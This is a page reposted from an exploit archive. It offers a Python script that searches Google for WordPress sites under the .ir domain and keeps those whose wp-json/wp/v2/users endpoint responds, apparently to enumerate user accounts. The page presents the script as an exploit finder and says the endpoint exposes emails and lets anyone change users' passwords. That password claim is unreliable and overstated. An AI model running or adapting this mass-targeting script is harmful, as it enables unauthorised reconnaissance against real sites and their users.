EXPLOIT FINDER WordPress User Enumeration
2024-11-18 05:29:53 Author: cxsecurity.com(查看原文) 阅读量:8 收藏

EXPLOIT FINDER WordPress User Enumeration

With this code, you can search Google and isolate the sites that have this security issue and test which ones have the WP JSON/WP/V2/Users API endpoint, which allows you to retrieve user data such as user ID, username, email address, and other user profile information. You can also use the API to update user data, such as changing a user's password or updating their profile information. ##################################################### # # # CODE BY E1.Coders # # EXPLOIT FINDER WordPress User Enumeration # # # ##################################################### import requests from googlesearch import search import time def find_sites(query, num_results): """Search Google for the specified query and return a list of URLs.""" urls = [] for url in search(query, num_results=num_results): urls.append(url) return urls def check_url_status(url): """Check the HTTP status of a given URL.""" try: response = requests.get(url) return response.status_code except requests.RequestException: return None def main(): # Step 1: Search for sites with the specific query query = 'site:.ir wp-json/wp/v2/users' num_results = 100 # Adjust the number of results as needed found_sites = find_sites(query, num_results) # Step 2: Save found sites to a file (753.txt) with open('753.txt', 'w') as f: for site in found_sites: f.write(f"{site}\n") # Step 3: Check each site and save those with a 200 status code to another file (963.txt) with open('963.txt', 'w') as f: for site in found_sites: status_code = check_url_status(site) if status_code == 200: f.write(f"{site}\n") time.sleep(1) # To avoid overwhelming the server if __name__ == "__main__": main()



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024110026
如有侵权请联系:admin#unsafe.sh